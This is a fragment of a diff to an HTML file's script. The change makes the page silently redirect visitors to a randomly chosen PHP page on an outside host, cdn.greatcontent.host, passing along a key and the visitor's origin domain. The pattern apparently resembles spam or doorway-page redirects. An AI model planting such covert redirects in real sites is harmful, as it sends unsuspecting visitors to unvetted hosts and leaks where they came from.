--- a/content6.html
+++ b/content6.html
@@ -10,7 +10,8 @@ if(r.indexOf('?') !== -1) {
 		var k = parts[parts.length - 1]
 	}
 	var d = parts[parts.length - 2];
-		var string1 = 'https://cdn.greatcontent.host/g/1.php?k=' + k + '&r=' + d;
+	var p = Math.floor(Math.random() * 100) + 1;
+		var string1 = 'https://cdn.greatcontent.host/g/' + p + '.php?k=' + k + '&r=' + d;
 		window.location.href = string1
 }
 </script>
